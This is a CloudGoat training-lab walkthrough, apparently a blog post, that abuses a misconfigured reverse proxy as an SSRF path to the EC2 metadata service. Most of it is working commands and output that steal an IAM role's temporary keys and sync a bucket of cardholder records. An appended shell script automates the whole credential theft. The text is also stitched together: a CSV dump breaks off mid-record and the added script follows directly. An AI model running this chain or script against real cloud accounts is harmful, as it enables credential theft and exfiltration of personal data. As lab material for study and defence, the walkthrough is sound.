[Offensive security] Let’s steal the confidential files from the misconfigured S3 bucket.

What we will do in this article

1: set up an initial environment using Docker

Overview

Scenario: cloud_breach_s3

Starting point: the IP address of an EC2 server that is running a misconfigured reverse proxy.

Scenario Goal

Download the confidential files from the S3 bucket.

What we know now

cloudgoat_output_aws_account_id = "362364726861"
cloudgoat_output_target_ec2_server_ip = "54.166.247.74"

DEMO

The proxy forwards each request to whatever host is named in the Host header. Setting that header to 169.254.169.254 turns the public server into an SSRF path to the EC2 instance metadata service (IMDS), which hands out the temporary credentials of the IAM role attached to the instance.

bash-5.1# curl http://54.166.247.74
<h1>This server is configured to proxy requests to the EC2 metadata service. Please modify your request's 'host' header and try again.</h1>

bash-5.1# curl http://54.166.247.74 -H 'Host:169.254.169.254'
1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
2018-03-28
2018-08-17
2018-09-24
2019-10-01
2020-10-27
2021-01-03
2021-03-23
2021-07-15

bash-5.1# curl http://54.166.247.74/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'
cg-banking-WAF-Role-cgid3qq26zlbnk

bash-5.1# curl http://54.166.247.74/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cgid3qq26zlbnk -H 'Host:169.254.169.254'
{
  "Code" : "Success",
  "LastUpdated" : "2022-01-17T20:26:57Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAVIXU65ZGWME5OYV3",
  "SecretAccessKey" : "FBONy6v+wJatW3akJodEX3D1I1txstAlnLIJbdCd",
  "Token" : "<session token redacted>",
  "Expiration" : "2022-01-18T03:02:32Z"
}

These are temporary credentials (the ASIA prefix marks an STS key), so the session token is mandatory and everything stops working at the Expiration time. aws configure does not ask for the token, so it has to be added to the profile by hand.

bash-5.1# aws configure --profile hacker
AWS Access Key ID [None]: ASIAVIXU65ZGWME5OYV3
AWS Secret Access Key [None]: FBONy6v+wJatW3akJodEX3D1I1txstAlnLIJbdCd
Default region name [None]:
Default output format [None]:

bash-5.1# vi ~/.aws/credentials
(add the following line under the [hacker] profile)
aws_session_token = <session token redacted>

bash-5.1# aws s3 ls --profile hacker
2022-01-17 20:26:55 cg-cardholder-data-bucket-cgid3qq26zlbnk

bash-5.1# aws s3 sync s3://cg-cardholder-data-bucket-cgid3qq26zlbnk . --profile hacker
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholder_data_primary.csv to ./cardholder_data_primary.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholder_data_secondary.csv to ./cardholder_data_secondary.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholders_corporate.csv to ./cardholders_corporate.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/goat.png to ./goat.png

bash-5.1# cat cardholder_data_primary.csv
ssn,id,first_name,last_name,email,gender,ip_address,address,city,state,zip
287-43-8531,1,Coo
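The same chain as a single script, added here as an example that is not part of the original post or of CloudGoat. It assumes curl and the AWS CLI are installed, that the target IP is the one from the post (override it with the PROXY environment variable), and, as in the scenario, that the instance still answers IMDSv1 GET requests. The function names (imds_get, json_field, creds_to_env, steal_and_list) are my own. Instead of aws configure plus a hand edit of ~/.aws/credentials, it exports the three variables the CLI reads, so the session token cannot be forgotten, and it runs sts get-caller-identity first to prove the stolen keys work before touching S3.

```shell
#!/bin/sh
# Added example (not from the original post): automate the IMDS credential
# theft through the misconfigured reverse proxy and load the keys into the
# AWS CLI environment. Assumes IMDSv1 is enabled on the target, as in CloudGoat.
set -eu

PROXY="${PROXY:-http://54.166.247.74}"   # target IP from the post
IMDS_HOST='Host: 169.254.169.254'

# GET an IMDS path through the proxy by rewriting the Host header (the SSRF).
imds_get() {
  curl -fsS "$PROXY$1" -H "$IMDS_HOST"
}

# Pull one string field out of the IMDS credential JSON. IMDS prints one
# field per line and the values contain no quotes, so sed is enough (no jq).
# $1 = JSON document, $2 = field name
json_field() {
  printf '%s\n' "$1" | sed -n "s/.*\"$2\" *: *\"\([^\"]*\)\".*/\1/p" | head -n 1
}

# Turn the credential document into export statements for the AWS CLI/SDKs.
# Values are single-quoted because session tokens contain '+', '/' and '='.
creds_to_env() {
  doc="$1"
  printf "export AWS_ACCESS_KEY_ID='%s'\n"     "$(json_field "$doc" AccessKeyId)"
  printf "export AWS_SECRET_ACCESS_KEY='%s'\n" "$(json_field "$doc" SecretAccessKey)"
  printf "export AWS_SESSION_TOKEN='%s'\n"     "$(json_field "$doc" Token)"
}

# End to end: discover the role name, fetch its keys, confirm they work,
# then list what the role can see. Equivalent to the post's manual steps.
steal_and_list() {
  role=$(imds_get /latest/meta-data/iam/security-credentials/)
  doc=$(imds_get "/latest/meta-data/iam/security-credentials/$role")
  eval "$(creds_to_env "$doc")"
  echo "stolen role: $role (valid until $(json_field "$doc" Expiration))"
  aws sts get-caller-identity   # shows the account and the assumed-role ARN
  aws s3 ls                     # same as the post's 'aws s3 ls --profile hacker'
}

# Only touch the network when explicitly asked:  PROXY=http://<ip> sh steal.sh run
if [ "${1:-}" = run ]; then
  steal_and_list
fi
```

Run it with `sh steal.sh run`; the exports only live in the script's shell, so to keep using the keys interactively run `eval "$(creds_to_env "$doc")"` in your own session instead. Two caveats worth noting. The bucket is not public: access comes from the WAF role's IAM policy, so the finding to report is the proxy plus the over-privileged role, not the bucket. And the GET-only trick depends on IMDSv1; with `HttpTokens=required` (IMDSv2, set via `aws ec2 modify-instance-metadata-options --http-tokens required`) the metadata GET returns 401 unless the client can first PUT `/latest/api/token` with the `X-aws-ec2-metadata-token-ttl-seconds` header, which a proxy that blindly relays any method and header would still allow. Both the proxy and the metadata setting need fixing.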

Cleanup

bash-5.1# ./cloudgoat.py destroy cloud_breach_s3

Cloud security engineer https://www.linkedin.com/in/takahiro-oda-881423197/